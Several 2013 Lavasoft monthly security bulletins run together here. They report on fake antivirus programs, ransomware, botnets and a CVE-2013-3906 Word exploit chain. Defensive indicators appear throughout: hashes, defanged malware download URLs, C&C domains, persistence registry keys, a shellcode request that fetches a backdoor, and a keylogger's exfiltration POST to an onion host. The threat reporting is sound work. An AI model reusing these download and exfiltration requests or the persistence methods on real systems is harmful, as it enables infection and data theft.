Attackers again show an interest in Bitcoin. With malicious programs such as Skyper attackers can install a bitcoin generator on compromised computers. For this time, attackers went on and organize a tandem with IRC bots.

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Top20 PUPs detected on user’s PC

Operating Systems

Infections by OS

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Top20 Blocked Malware

The Top 20 malicious programs blocked on PCs

August sees new detections in the Top 20 while Email-Worm.Win32.Brontok.a and Worm.Win32.Pykspa make a return to the prevalence list having last been seen in June 2013 and April 2013, Trojan.Win32.Gframe, detecting malicious IFrames embedded in GIF files, makes an appearance at position nine.

Trojan.Win32.Gframe (MD5: ffd89e57a371bec38a249354be8fff0e)

New Incomings to the Lab

Let’s review and consider information on the number of unique files with the same detection name.

New malicious programs entered the Top 20

Fake antiviruses holding machines to ransom until a fee is paid to unlock their computers continue to blight users. In August, our systems detected the following fake antiviruses:

Fake AV (MD5: 54828dd3e11fc1b5401745bdb5ae4251) is detected by Ad-Aware as Trojan.Win32.Reveton.a

Fake AV (MD5: 8ca5e580c60e66d4c87f9aa408946fc3) is detected by Ad-Aware as Trojan.Win32.Generic!BT

Fake AV (MD5: f83ca10a393ec4759202c077d63c3a20) is detected by Ad-Aware as FraudTool.Win32.FakeAV.hdd

Another prevalent class of malware is ransomware. This month we discovered a new take on the ransom tactic, called “PRISM locker”. It tricks users by showing popups, supposedly from the “NSA”, claiming they have been caught downloading and distributing illegal content, forcing the victim to pay a fine of $300 to unlock the computer.

PRISM locker (MD5: e1988e7512bb18dc0e3ed946ca466d0f) is detected by Ad-Aware as Trojan.Win32.Generic

Once launched the Trojan adds a reference to the registry Run key ensuring the infected computer will be locked with the next system start up:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"internat.exe"

You can find more details about that malware here.

New Features of Kelihos

Recently we published a report on Kelihos Update, where we presented new app targets and installation features in the backdoor. The paper also revealed that the botnet was still in operation and all six job servers were up and running.

Thanks to VirusTotal we can see several cached requests to the Kelihos job server:

The most remarkable change was in the installation procedure. Previous versions added “SonyAgent” values in a system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SonyAgent"=""
[HKCU\Software\Sony]
"SonyID"="DCmkXuRtjruvB1iHVBkEJlW2S+BimFp/lF4WuQjFyUZiEEBn51H4u+8OsvFwcsEfxA=="
"SonyID1"=dword:00000050
"SonyID2"=hex:00,00,00,00,00,00,00,00
"SonyID3"= (data_in_hex)

This time it uses randomization for registry entries and filenames, which complicates recognizing the infection for an ordinary user. The backdoor tries to mimic names of system files and services:

Kelihos uses random names from the list when spreading via removable drives by creating its copies and lnk files:

X:\{password, screensaver, click, installer, hentai, run, porn, game}.exe
X:\Shortcut to %file name from the list%.lnk

The additional dummy user-agents are used to avoid blocking http connections. The number of fake agents increased from 28 to 47 since March.
There are new incomings among targeted applications where the backdoor looks for user credentials as well:

Cyberduck, FreshFTP, FTPShell, Global Downloader, Notepad++, TFTPInfo, MyFTP, Sherrod, NovaFTP, CoolNovo

We scanned again fast-flux network for “ditojtap.ru” and harvested 4543 IP addresses that help to deliver updates to zombie computers.

It looks pretty similar to the map built for 6244 proxy-bots in March:

Both maps reveal that Ukraine is the most affected country with 47% of infected computers in the botnet’s fast-flux network.
The VirusTotal cached some of the DNS requests:

The main finding is that the botnet is still in operation despite all attempts to take it down. You can find a description of the latest downloaded sample in our Malware Encyclopedia.

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Top20 PUPs detected on user’s PC

Operating Systems

Infections by OS

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Top20 Blocked Malware

The Top 20 malicious programs blocked on PCs

Malware Prevalence Table - September 2013

Let’s review and consider information on the most prevalent families detected in September.

New malicious programs entered the Top 20

September sees new Fake-AV interfaces that supposedly detect hidden threats on a user’s computer.

Fake AV (MD5: cc2fedff4406e3f620b84983057fabbb) is detected by Ad-Aware as Trojan.Win32.Kryptik.acsn

Ransomware continues to blight users, blocking computers and encrypting private data. Lavasoft recently discovered a non-detected crypto locker titled “Anti-Child Porn Protection” that encrypts user’s data demanding a ransom to decrypt them. As described within the locker’s notification window, the ransomware utilizes AES-256, an unbreakable cipher. Bruteforcing is not practical as it needs to cover 1.1x1077 combinations which would take 3.31x1056 years (EETimes) as well, as recovery tools used to restore erased original files like in case of GpCode.ak that used RSA-1024.

Ransomware (MD5:0b06eb1ed254790e38d7b5accc0fe072) is detected by Ad-Aware as Trojan.Win32.Generic

It is worth noting that this ransomware was created in October 2012 - since that date we see no detections on the VirusTotal multi-scanner. It is detected by Ad-Aware Antivirus as Trojan.Win32.Generic and described in the Malware Encylopedia.

Bots Review

Table 1: Bots under analysis (September 2013, Lavasoft MAS).

Aliases*: Generic verdicts were not included.
Autorun: yes*: [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
Autorun: yes**: [HKLM\Software\Microsoft\Windows\CurrentVersion\Run], [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]

Bot distribution in September:

Autorun
All the bots analysed exploit the “HKLM\Software\Microsoft\Windows\CurrentVersion\Run” registry key to launch itself when Windows boots up. The Shiz backdoor also uses “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon” in a further attempt to survive a reboot.

DorkBot and Shiz block AV websites preventing users from downloading the latest updates. A recent Dorkbot block list contains 1258 URLs and can be downloaded from one the bots: hxxp://146.185.237.111/va.txt (also available from our mirror.)

Additionally, Shiz and DorkBot use server-side polymorphism to avoid detection.

Recently we found many references on the Internet stating that Kelihos supposedly checks if a victim’s IP is in online blacklists (CBL – composite block list). This information was published by ZScaler Lab and referenced by ThreatPost and hundreds of others news sites.

Unfortunately, we could neither find CBL requests in our database nor reproduce such behavior on the Kelihos sample used by ZScaler (fbad0969a3fe539fa048df9912b8c6d4). In addition, Kelihos uses HTTP protocol to communicate with peers, not SMTP as was noted by ZScaler. The SMTP traffic that highlighted by ZScaler researcher can be explained by spambot activity, which implies numerous connections to SMTP servers. It is possible that the analysts mistakenly attributed blocking replies from SMTP servers as being part of the Kelihos protocol.

SMTP traffic generated by mail servers when Kelihos sends spam

Self-Propagation
The bots can propagate via removable drives (Kelihos uses a vulnerability in LNK files), social networks (DorkBot), Instant Messengers (Dorkbot, Blazebot) and filesharing services, like Dropbox (Blazebot with Rbot). Drive-by attacks and downloading by other malware are also used to deliver a backdoor.

Communication Protocols
HTTP and IRC protocols are the most commonly used nowadays. We noticed that such IRC bots as Dorkbot, Blazebot and Rbot are operating together and probably owned by the same botmaster.

Bot distribution by the type of communication protocol

Rootkit Activity
Four bots out of six (Zbot, Kelihos, DorBot, Shiz) install user-mode hooks into Windows system DLLs in order to spy on user’s activity. Zbot has the highest number of hooks being installed.

Network Activity
All revised bots are still alive, showing network activity and downloading updates.

According to last month’s network activity, Kelihos and Dorkbot were using Amazon’s Cloud Service to host malicious files. In September we found eighty-eight malicious samples that connected to compute.amazonaws.com for bot updates.

The first of such connections made by Kelihos were detected in June 2013 and only continue to grow – it would appear that Amazon's Cloud is becoming popular among bot-masters, being used to increase their botnets.

Amazon Web Services

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Top20 PUPs detected on user’s PC

Operating Systems

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Top20 Blocked Malware

The Top 20 malicious programs blocked on PCs

Malware Prevalence Table - October 2013

Let’s review and consider information on the number of unique files with the same detection name.

New malicious programs entered the Top 20

A new Fake-AV interface that falsely claims to detect hidden threats on a user’s computer was discovered in the wild in October. It is detected by twelve of the forty-eight antiviruses on VirusTotal.

Fake AV (MD5: a3ed09d61f7622ec506e12f967ae06ba) is detected by Ad-Aware as Gen:Variant.Strictor.4450

Virustotal detects MD5: a3ed09d61f7622ec506e12f967ae06ba

Ransomware infections are on the rise. A new variant claims that local law enforcement/government organisations have blocked the affected computer. The new blocker detects a country by the victim’s IP address and shows a corresponding message in order to make the scam seem legitimate. This threat is detected by fifteen of the forty-eight antiviruses on VirusTotal.

Ransomware: (MD5: f6d63190089664f276b65a7c3baf8aa0) is detected by Ad-Aware as Trojan.Generic

Virustotal detects for MD5: f6d63190089664f276b65a7c3baf8aa0

AlienVault Lab recently announced that new ransomware variants now demand BitCoins to unlock a computer.

The crypto blocker (MD5: 012d9088558072bc3103ab5da39ddd54) detected by Microsoft as Trojan:Win32/Crilock.A demands payment in either MoneyPak (USA only), Ukash, cashU and Bitcoin making it harder to trace the attacker. As usual, the crypto locker tries to intimidate the victim user with the encryption details used, such as algorithm name and its unbreakable key length: RSA-2048 referencing to Wikipedia. The program uses standard Microsoft Enhanced Cryptographic Provider v1.0.
To automatically run itself each time Windows is booted, the blocker adds the following link to its file to the system registry autorun key:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"CryptoLocker" = "%Documents and Settings%\%user%\Application Data\{D0EE94E5-EF8C-E6CC-8E83-EFF5CFCD2F14}.exe"

The malware tries to connect to C&C using DGA (Domain Generation Algorithm) to get RSA public key for encryption:

The C&C server is not currently reachable and some of the domains are sinkholed:

Once the key is received from the C&C server the malware starts looking for files with the following extensions aiming to encrypt them:

*.odt, *.ods, *.odp, *.odm, *.odc, *.odb, *.doc, *.docx, *.docm, *.wps, *.xls, *.xlsx, *.xlsm, *.xlsb, *.xlk, *.ppt, *.pptx, *.pptm, *.mdb, *.accdb, *.pst, *.dwg, *.dxf, *.dxg, *.wpd, *.rtf, *.wb2, *.mdf, *.dbf, *.psd, *.pdd, *.eps, *.indd, *.cdr, img_*.jpg, *.dng, *.arw, *.srf, *.sr2, *.bay, *.crw, *.cr2, *.dcr, *.kdc, *.erf, *.mef, *.mrw, *.nef, *.nrw, *.orf, *.raf, *.raw, *.rwl, *.rw2, *.ptx, *.pef, *.srw, *.der, *.cer, *.crt, *.pem, *.pfx

To get a private key a user should pay $300 in a limited amount of time (72 hours) after which the key will be deleted. If you try to enter incorrect information the locker will reduce the time to destroy the private key in half.

This is yet another example of ransomware which has started demanding ransoms be paid in BitCoins making these transactions anonymous and for all intents and purposes, impossible to trace.

Bots Review

Table: Bots under analysis (October 2013, Lavasoft MAS).

Bot distribution in October:

In the last Kelihos report we noticed that the backdoor uses randomization for autorun key registry values and for dropped files names. In October we saw an increased variety in Kelihos update file names.
In addition to the well known names:

calc.exe, rasta02.exe, traff01.exe, keybex4.exe, mongo02.exe

We discovered some new ones; some of them contain Russian names (e.g. Misha, Boris):

devils1.exe, userid2.exe, mia0002.exe, blacks1.exe, felix03.exe, goodtr2.exe, same7b1.exe, b0ber03.exe, inkr001.exe, safpro1.exe, bubba04.exe, nimble1.exe, gossam1.exe, upeksvr.exe, tretiy1.exe, misha01.exe, boris02.exe, balls02.exe, crypt01.exe, dun0004.exe

Shiz backdoor has been still using DGA to create new domain names with European Union’s top-level domain “.EU” (sample MD5: b19171daa6f4602db826c9c4bd9d2fe5):
Resolved:

IP: 50.116.56.144 Name: gadufiwabim.eu
IP: 50.116.56.144 Name: cihunemyror.eu
IP: 50.116.56.144 Name: jefapexytar.eu
IP: 173.230.133.99 Name: kefuwidijyp.eu
IP: 204.79.197.200 Name: www.bing.com
IP: 50.116.56.144 Name: foxivusozuc.eu
IP: 50.116.56.144 Name: fokyxazolar.eu
IP: 50.116.56.144 Name: ryqecolijet.eu
IP: 96.43.141.186 Name: digivehusyd.eu
IP: 50.116.56.144 Name: xuqohyxeqak.eu
IP: 50.116.56.144 Name: lyruxyxaxaw.eu
IP: 50.116.32.177 Name: galokusemus.eu
IP: 166.78.144.80 Name: jewuqyjywyv.eu

Unresolved:

gahihezenal.eu, puregivytoh.eu, nofyjikoxex.eu, tuwikypabud.eu, qegytuvufoq.eu, kepymexihak.eu, vojacikigep.eu, makagucyraj.eu, xuxusujenes.eu, tucyguqaciq.eu, lymylorozig.eu, jepororyrih.eu, xubifaremin.eu, nozoxucavaq.eu, dimutobihom.eu, voniqofolyt.eu, puvopalywet.eu, ciliqikytec.eu, tunujolavez.eu, xutekidywyp.eu, dikoniwudim.eu, fogeliwokih.eu, dixemazufel.eu, divywysigud.eu, lyvejujolec.eu, puzutuqeqij.eu, fobonobaxog.eu, qederepuduf.eu, rydinivoloh.eu, kemocujufys.eu, lysovidacyx.eu, nojuletacuf.eu, qeqinuqypoq.eu, magofetequb.eu, tupazivenom.eu, marytymenok.eu, rynazuqihoj.eu, jejedudupuc.eu, rytuvepokuv.eu, volebatijub.eu, ciqydofudyx.eu, vofozymufok.eu, cinepycusaw.eu, keraborigin.eu, qetoqolusex.eu, pumadypyruv.eu, nopegymozow.eu, masisokemep.eu, gatedyhavyd.eu, fodakyhijyv.eu, cicaratupig.eu, vocumucokaj.eu

The request to the C&C server looks like:

We can see in the reply for one of the domains that it has been already sinkholed to 166.78.144.80 (X-Sinkhole: malware-sinkhole).

Zbot also started using .EU domains for communication with C&C:

NrgBot/DorkBot continues using Dropbox to download BitCoin Miner tool:

hxxp://www.v.dropbox.com/s/thpae3fchbmgkf2/sym.exe?dl=1 (f865c199024105a2ffdf5fa98f391d74, RiskTool.Win32.BitCoinMiner)

And a worm Shakblades which has been removed recently from the Dropbox servers:
hxxp://www.v.dropbox.com/s/dcynlnz0yitlxyj/rep.exe?dl=1 (044de297a0c023d939300d84e95074ee, detected as Worm.Win32.Shakblades).

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Top20 PUPs detected on user’s PC

Operating Systems

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Top20 Blocked Malware

The Top 20 malicious programs blocked on PCs

Malware Prevalence Table - November 2013

The table below ranks the most prevalent families seen in November.

New malicious programs entered the Top 20

A new Fake-AV interface that falsely claims to detect hidden threats on a user’s computer was discovered in the wild in November. It is detected by Ad-Aware as Trojan.Generic.6779300.

Fake AV (MD5: 64eeefff673a9ab54d060842430be2b7) is detected by Ad-Aware as Trojan.Generic.6779300

Ransomware continues to intimidate and scam users. Recent variants claim to be messages from local law enforcement/government organisations that have blocked the affected computer due to violations of laws related to viewing/distributing pornography and downloading torrents. As usual the majority of blockers suggest paying a fine of $300 using MoneyPak, Ukash and PaySafeCard.

Ransomware (MD5: 4de74cbc160042adfe9c012b71b3d935) is detected by Ad-Aware as Gen:Variant.Kazy.289928

Ransomware (MD5: 4f0f38bad8279cc0705cf6dd563c6bc6) is detected by Ad-Aware as Gen:Variant.Kazy.289928

Ransomware (MD5: 6c8bfd752e032fef6a9d168f923a5231) is detected by Ad-Aware as Gen:Variant.Kazy.289928

However we caught the French blocker which suggests paying with a bank card.

Ransomware (MD5: 6c0e73b795787d651606847d73bc326e) is detected by Ad-Aware as Gen:Variant.Strictor.36755

Some ransom families have introduced countdown timers (48 hours on the screenshot below) in the latest versions. Similar timers were used by Cryptoblocker described in the October’s Security Bulletin.

Ransomware (MD5: 8bcc460ca4171cfe6165c3e10caf97fa) is detected by Ad-Aware as Gen:Variant.Kazy.285775

Some of the Trojan-ransoms show the pornography content supposedly found on a user’s computer which is common technique for the most of ransomware.

Ransomware (MD5: 908478d1f1faa539f228bbe4fcf23b6d) is detected by Ad-Aware as Gen:Variant.Kazy.285775

Microsoft Office Zeroday

On 5th November, Microsoft reported a new vulnerability, CVE-2013-3906, when processing Microsoft Word documents. The exploit is embedded in a specially crafted Word document that contains a malformed TIFF image which may cause malicious code execution. The exploit is able to bypass DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization) protections but will not work while blocking ActiveX controls embedded in documents is enabled.
According to AlienVault Lab the first known attack appeared to target a Pakistani audience as the malicious documents are related to the Pakistani military and Intelligence Service - the downloaded backdoors also connect to C&C located in Pakistan. The documents were dated 22nd of October 2013.

We analyzed several CVE-2013-3906 exploits delivered in DOCX. All of them execute shellcode statically sprayed within the document having the same structure:

Shanti Dyanamite.docx (MD5: 1fd4f3f063d641f84c5776c2c15e4621)

All the shellcode has the identical obfuscated code. It uses runtime linking to load the standard set of functions: kernel32.dll: GetTempPathA, ExitProcess, shell32.dll: URLDownloadToFileA, urlmon.dll: ShellExecuteA.

After execution the shellcode downloads the backdoor.

GET /bruce/winword.exe HTTP/1.1
Host: flatnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

The exploits differ only by malware downloading URL at the end of the shellcode. The below URLs were offline at the time of analysis:

hxxp://myflatnet.com/ralph_3/winword.exe
hxxp://landasc.w100.1860php.com/kor.exe
hxxp://210.19.13.199/java.exe

However, others are still utilized to download the following backdoors:

The downloaded backdoor in the first case (servers.exe, MD5: 7896b76c83ddcdcb9f269dc242b914eb) contains the stolen certificate:

The second downloaded file is a Trojan-Dropper detected as Dropped:Trojan.Generic.9860611 by Ad-Aware that drops the following files to %Documents and Settings%\%user%\Templates\:

1. GoogleTool.exe (116 648 bytes, MD5: 506708142bc63daba64f2d3ad1dcd5bf) – original GoogleUpdate.exe application, which is signed by Google Inc.:

2. Goopdate.dll (44 544 bytes, MD5: e4cb1ea2667f1b3b712f4402f0737627) – malicious DLL that use the name of the legal GoogleUpdater library.

3. Noew.SAM (143 360 bytes, MD5: 57c2f8891234bcd4034bc830ce64d0c8) – obfuscated PE file.

To automatically run itself each time Windows is booted, the Trojan-Dropper adds the following link to its file to the registry run key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft" = "%Documents and Settings%\%current user%\Templates\GoogleTool.exe"

The GoogleTool.exe (original name is GoogleUpdate.exe) is designed to link the dll with the hardcoded name “goopdate.dll”.

Unicode strings from GoogleTool.exe (GoogleUpdate.exe)

This peculiarity is used by malware authors to launch a malicious module which has the same name (goopdate.dll). The DLL checks if it has been loaded by GoogleTool.exe to launch the malicious payload “rundll32.exe goopdate.dll,MyExtern”.

The payload of the DLL is decoding the dropped Noew.SAM file:

Which turns into a malicious DLL after decoding (MD5: f573cedb34ef3c92d686f9b03c078589):

The DLL is the DarkShell backdoor detected by 13/46 antiviruses on VirusTotal

Once started the backdoor connects to the following C&C server:

website.baesystems.ca (112.175.79.49:8001)

The server was offline during analysis. According to WhoIs service it is located in South Korea.
The DarkShell provides the remote access to the attacker which allows the following on the infected computer:
- a reverse shell,
- keylogging,
- making screenshots,
- video capture,
- downloading and executing applications,
- collecting system information (Windows version, memory, processor, computer name),
- checking for the installed firewall or antivirus from the list below:

AntiVir
Avast Antivirus
AVG Antivirus
BitDefender
Dr.Web
Kaspersky Antivirus
Nod32 Antivirus 2.x
Ewido Security Suite
McAfee VirusScan
Panda Antivirus/Firewall
Symantec/Norton
PC-cillin Antivirus
F-Secure
Kingsoft Internet Security 2008
NOD32 Antivirus 3.x
Rising Antivirus 2008
Jiangmin Antivirus
360 Antivirus
Norton Personal Firewall
ZoneAlarm
Comodo Firewall
eTrust EZ Firewall
F-Secure Internet Security
McAfee Personal Firewall
Outpost Personal Firewall
Panda Internet Seciruty Suite
Panda Anti-Virus/Firewall
BitDefnder/Bull Guard Antivirus
Rising Firewall
360Safe AntiArp

- checking for the running processes from the list below:

avesvc.exe
ashdisp.exe
avgcc.exe
bdss.exe
spider.exe
avp.exe
nod32krn.exe
ewidoctrl.exe
mcshield.exe
pavfires.exe
ccapp.exe
pccntmon.exe
fssm32.exe
kavstart.exe
egui.exe
ravmon.exe
kvsrvxp.exe
bdagent.exe
issvc.exe
vsmon.exe
cpf.exe
ca.exe
tnbutil.exe
mpfservice.exe
outpost.exe
tpsrv.exe
pavfires.exe
kpf4ss.exe
rfwsrv.exe
antiarp.exe

We can conclude that the attack had several steps that ultimately lead to the backdoor installation. It starts from the exploitation of the recently discovered CVE-2013-3906 vulnerability used in DOCX then continues with downloading and dropping the legitimate GoogleUpdate.exe application to run a malicious DLL which decrypts and executes the backdoor body.

The attack scheme using CVE-2013-3906 and GoogleUpdate

From the analysis the following points come out that help the attack to be undetectable and wide spread:
• Using CVE-2013-3906 discovered in the beginning of November (Microsoft FixIt tool was released that disables TIFF codec on a user’s system).
• Using the legitimate GoogleUpdate application as a malware launcher, it is started from the autorun key in the system registry.
• The backdoor body is obfuscated using a simple shuffling algorithm which helps to avoid detection.
• The backdoor (DarkShell) and decoding module (goopdate.dll) are implemented as DLLs and loaded by the trusted GoogleUpdate.exe and rundll32.exe processes.
We are expecting more attacks using the CVE-2013-3906 vulnerability in DOCX files the next month and recommend our readers to install FixIt from Microsoft or install Ad-Aware antivirus.

Bots Review

Table: Bots under analysis (November 2013, Lavasoft MAS).

Bot distribution in November:

Kelihos

This month we observed new file names in the URLs used to download Kelihos updates:

whiteh1.exe boris03.exe dun0006.exe setup21.exe setup22.exe nimble2.exe safpro01.exe inkr001.exe

We noticed that some of the names were slightly modified by incrementing the suffix number, like ‘boris02.exe’ in October and ‘boris03.exe’ in November.

Cycbot. The latest description on Cycbot can be found here. The backdoor can be easily detected by the following connection:

hxxp://TRANSERSDATAFORME.COM/gate.php

Shiz A new description has been added to the Malware Encyclopedia where we continue to see EU domains being used by the backdoor.

Zbot, similar to Shiz, continues to use EU domains to download malicious binaries.

NrgBot/DorkBot

The latest description shows that the bot connects to the phishing domain:

hxxp://api.wipmania.com.stcus.ru/icon/n.api

together with the request to the original one:

hxxp://api.wipmania.com/

It downloads "n.api" file (MD5: 8b6bf3920aee6ad725cdc06bb815cab7) which is an NrgBot update detected by Ad-Aware as Trojan.GenericKD.1433214)

In November, we caught an Rbot variant that used Dropbox to download malware:

hxxps://www.dropbox.com/s/6hmm09s9gg54wep/critical.exe?dl=1

The content downloaded by the link is currently temporarily disabled due a high number of download requests. At the time of analysis the file was Bitcoin Miner tool (MD5: afcf6074a63ed40209cbdf8818e59fea) and detected by Ad-Aware as Trojan.Generic.10020557.

Nrgbot also used Dropbox last month to download BitCoin Miner and Shakblades Worm.

During the month we detected 13 successful downloads from Dropbox by different malware.

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Top20 PUPs detected on user’s PC

Operating Systems

Geographic Location

Contents

1. Fake-AVs

2. Ransomware

3. Bitcoin Games

4. 64-bit Malware

5. Tor-based Malware

6. 0-Day Exploits

7. Bot Review

8. Statistics 2013

9. Forecast for 2014

In the final Security Bulletin of 2013, we will highlight the most prevalent security incidents during the year.

1. Fake-AVs

This class of malware remains as prevalent as ever. This year we analysed more than 90, 000 Fake-AV modifications which introduced a plethora of new GUI designs, similar to top 10 AV solutions, in an effort to trick unsuspecting victims.

Fake AV (MD5: 64eeefff673a9ab54d060842430be2b7) is detected by Ad-Aware as Trojan.Generic.6779300

You can find more examples of them in our Rogue Gallery and Malware Encylopedia.

2. Ransomware

We saw an increase in the ransom demand, rising from $200 last year to $300 for the majority of versions this year.

Ransomware (MD5: 4f0f38bad8279cc0705cf6dd563c6bc6) is detected by Ad-Aware as Gen:Variant.Kazy.289928

Anonymous payments are made via MoneyPak, Ukash and PaySafeCard.

Ransomware (MD5: 4de74cbc160042adfe9c012b71b3d935) is detected by Ad-Aware as Gen:Variant.Kazy.289928

Some of the blockers added a countdown timer for 48 hours.

Ransomware (MD5: 6c8bfd752e032fef6a9d168f923a5231) is detected by Ad-Aware as Gen:Variant.Kazy.289928

In addition to the typical Trojan-Ransom that appears to be a notification from law enforcement/government organisations that claim to have blocked affected computers due to supposed violations of the law, we discovered an attack by Cryptlockers in October
that accept Bitcoin as a payment method (detected by Ad-Aware as Trojan.GenericKDV.1243398).

This type of malware encrypts valuable data on a victim’s computer and demands a ransom in order to receive decryption key or tool.

3. Bitcoin Games

At the end of the year we saw a dramatic increase in Bitcoins prices - currently they average price for one Bitcoin is $584, the highest price being $1200 at the beginning of December.

Source: http://Bitcoincharts.com/markets/mtgoxUSD.html

Source: http://Bitcoinity.org/markets

The phenomenal interest in the virtual currency also could be motivation for the latest attack on the “inputs.io” Bitcoin banking service on October 23. According to the information published by inputs.io after the attack, 4100 BTC (US $2.4 million now) were stolen.

This is not the first case of Bitcoin theft. Other online services, such as Bitconica, Linode and Bitfloor, have been already hacked in 2012 with 128 000 Bitcoins stolen in total.

As a result of the spike in Bitcoin prices, many backdoors now install Bitcoin mining tools on infected computers to generate new Bitcoins, such as Skyper described in April 2013.

4. 64-bit Malware

Kaspersky Lab recently announced the detection of 64-bit version of Zeus backdoor dropped by 32-bit Zeus.

According to the published report the compilation date is 29 April 2013. Interestingly, this version of Zeus installed a Tor client to communicate with a C&C server.

We managed to acquire a copy of the latest 32-bit Zbot equipped with a Tor interface, which we checked for new features. For instance, is the 32-bit version of Zbot capable of running under 64-bit Windows?

Once started on a 64-bit platform, the backdoor executes a 32-bit version of svchost.exe process in order to inject the payload code later.

Two injects have been discovered during the analysis of the 32-bit svchost.exe image (~1196 Kbytes and ~150 Kbytes in size). The inject is detected by Ad-Aware as Trojan.Zbot.ICQ.

As usual the backdoor copies its body as:

c:\Users\%user%\AppData\Roaming\%rnd%\%rnd%.exe

For example:

It drops Tor client settings into:

c:\Users\%user%\AppData\Roaming\tor\

The infected computer name is included in a hidden Tor service that is silently launched – it can be found in the following file:

c:\Users\%user%\AppData\Roaming\tor\hidden_service\hostname
b742crfibawhnims.onion

The Tor proxy, pretending to be the 32-bit svchost.exe process, listens on port 9050:

The Tor protocol sends the data to C&C server secretly:

At the end we didn’t find any injects in 64-bit processes made by the current version of the backdoor. However, according to Kaspersky Lab, a Zeus variant was found which is able inject the malicious code into 64-bit Internet Explorer.

We may conclude that the analysed 32-bit version of Zeus can be successfully run under both 32- and 64-bit Windows (only 32-bit processes). The 64-bit variant of Zeus discovered by Kaspersky Lab can additionally inject the payload into 64-bit Internet Explorer. Using 64-bit applications may reduce the likelihood of infection but cannot be considered as a panacea as we expect more malware to be moving to the 64-bit platform. Using a reliable Antivirus continues to be the best method to protect your data such infections.

5. Tor-based Malware

The Tor network has been used with increasing frequency recently in order to disguise backdoor communication with C&C servers. In 2013 we detected and analysed 409 malware samples in Lavasoft MAS that use Tor client for communication with C&C, Zeus being counted among them.

We will describe how the Tor network serves the needs of the Trojan named “ChewBacca” recently mentioned in the Kaspersky blog.

The administration console contains the image of “ChewBacca”.

ChewBacca is a basic keylogger that uses the Tor network to send keystroke logs to a remote server.

Once executed, it copies itself to the “Startup” folder. It checks every 15 minutes to see if the process has been working not less than 24 hours and sends a log to the attacker.

The backdoor sets up a hook on keyboard events:

The keystrokes are stored in the “%Temp%\system.log” file:

Once a day, ChewBacca sends the logged information to the C&C server. The backdoor prepares HTTP packet for a Tor client to be sent:

POST /sendlog.php HTTP/1.0
Host: 5ji235jysrvwfgmb.onion
Keep-Alive: 300
Connection: keep-alive
User-Agent: ChewBacca/V1
Content-Type: multipart/form-data; boundary=463F8555_Synapse_boundary
Content-Length: 1605
--463F8555_Synapse_boundary
content-disposition: form-data; name="logfile"; filename="00_0C_29_E4_30_EA"
Content-Type: Application/octet-string
…
[2013-12-19 17:54:20.062 Debug] this typed text can be stolen by the keylogger
…
--463F8555_Synapse_boundary--

After encryption the data is then delivered through the Tor network anonymously - there is no chance of tracing the attacker’s server:

6. 0-Day Exploits

In the November Security Bulletin we analysed an attack using a common 0-day CVE-2013-3906 vulnerability, which was publicised by Microsoft on November 5, after a targeted, localised attack on Pakistani machines on 22nd of October.

Microsoft released a security patch on December 10 which fixed the vulnerability in GDI+ component being exploited by the specially crafted TIFF image.

The scheme of the attack is shown below:

An interesting point is that this attack utilized a legitimate Google application (GoogleTool.exe) which was used to run malicious “goopdate.dll” (the library with the same name is executed by GoogleUpdate application). After decoding the dropped “Noew.SAM” file, the DarkShell backdoor was installed on the victim’s computer.
Because it was not patched, during the month after discovery, the CVE-2013-3906 vulnerability in DOCX files became a very popular attack. We recommend downloading the patch (http://technet.microsoft.com/en-us/security/bulletin/ms13-dec) from Microsoft and installing Ad-Aware antivirus to protect against such attacks.

7. Bot Review

Table: Bots under analysis (* 1 Mar - 21 Dec 2013, Source: Lavasoft MAS).

Bot distribution in 2013*:

During 2013 we noticed the following peculiarities in bots behaviour:

• Using .EU domains to download malicious binaries (Zbot, Shiz).

• Using Dropbox to download potentially unwanted tools (e.g. Bitcoin Miner) and malware (e.g. Shakblades worm) – 121 malware were found. However, the malicious files are quickly deleted or blocked possibly due to the high number of bot requests.

• The DGA used by Shiz allows AV companies to sinkhole bot traffic.

• Despite the numerous takedowns the Kelihos botnet continues to operate. We wrote about the backdoor modifications and C&C servers used in March and August.

Recently the backdoor started using randomization for file names and registry keys during installation and continues changing the names of downloaded files. New names seen in December are: yanicha.exe, sheler1.exe, kecik01.exe, MIA2013.exe.

• As we mentioned earlier Zbot (Zeus) backdoor can be run under 64-bit Windows now (See “64-bit Malware”).

• Bots started using the Tor network for anonymous communication with a C&C server (See “Tor-Based Malware”).

